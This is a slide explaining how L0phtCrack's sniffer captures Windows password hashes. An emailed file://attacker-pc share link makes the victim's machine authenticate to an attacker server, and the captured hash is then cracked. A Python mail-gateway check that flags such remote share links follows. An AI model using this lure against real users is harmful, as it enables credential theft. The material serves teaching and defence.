Using L0phtCrack’s Sniffer
• Make the password hash come to you for authentication
  – Send email containing URL
    • file://attacker-pc/sharename/message.html
  – When victim clicks on URL, victim’s machine attempts to mount the share on attacker’s server using a challenge/handshake protocol
  – Password hash is captured by attacker-pc running L0phtCrack’s integrated sniffing tool
  – Password hash is fed into L0phtCrack to retrieve user’s password
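
A mail-gateway style check for the lure described above, added here as an example and not part of the original slide: it extracts file:// and UNC links from a message and reports those whose host is outside an allowlist. The allowlist suffix, the function names and the sample message are assumptions constructed for illustration.

```python
import re
from email import message_from_string, policy
from urllib.parse import urlsplit

# Assumption: DNS suffixes of file servers users may legitimately mount.
ALLOWED_SUFFIXES = (".corp.example",)
FILE_URL = re.compile(r"file:/{2,}[^\s\"'<>]+", re.IGNORECASE)
UNC_PATH = re.compile(r"\\\\([A-Za-z0-9._-]+)\\[^\s\"'<>]+")

# Constructed sample message; only the first URL comes from the slide.
SAMPLE = """\
From: helpdesk@example.org
To: user@corp.example
Subject: Please review
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<a href="file://attacker-pc/sharename/message.html">Open message</a>
<a href="file://fs01.corp.example/public/handbook.html">Handbook</a>
<a href="file:///C:/Users/Public/readme.txt">Local file</a>
<img src="\\\\203.0.113.7\\img\\logo.png">
"""

def share_host(file_url):
    """Return the remote host a file: URL points at, or None if it is local."""
    parts = urlsplit(file_url)
    if parts.hostname and parts.hostname != "localhost":
        return parts.hostname                  # file://host/share/...
    if parts.path.startswith("//"):            # file:////host/share/...
        return parts.path.lstrip("/").split("/", 1)[0].lower() or None
    return None                                # file:///C:/... is a local path

def find_remote_share_links(raw_email):
    """List (host, link) for links that would make the client authenticate
    to a share on a host outside the allowlist."""
    msg = message_from_string(raw_email, policy=policy.default)
    hits = []
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue
        body = part.get_content()
        found = [(share_host(m.group(0)), m.group(0)) for m in FILE_URL.finditer(body)]
        found += [(m.group(1).lower(), m.group(0)) for m in UNC_PATH.finditer(body)]
        hits += [(h, link) for h, link in found
                 if h and not h.endswith(ALLOWED_SUFFIXES)]
    return hits

if __name__ == "__main__":
    for host, link in find_remote_share_links(SAMPLE):
        print(f"remote share link -> {host}: {link}")
```
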